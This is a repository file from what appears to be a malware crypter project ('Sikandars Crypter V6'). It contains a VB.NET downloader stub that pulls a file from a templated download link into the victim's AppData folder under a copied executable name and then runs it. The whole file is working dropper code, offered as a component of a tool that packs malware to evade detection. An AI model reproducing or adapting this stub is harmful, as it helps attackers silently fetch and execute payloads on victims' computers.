Files
crypters-scode/scode (Sikandars.Crypter.V6.VB.NET/Resources/Downloader.txt
T
2026-08-27 11:04:21 -06:00

6 lines
347 B
Plaintext

Dim Expl As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & "\1" & IO.Path.GetFileName(System.Windows.Forms.Application.ExecutablePath)
My.Computer.Network.DownloadFile($DownloadLink$, Expl)
Do Until IO.File.Exists(Expl) = True
System.Threading.Thread.Sleep(1000)
Loop
System.Diagnostics.Process.Start(Expl)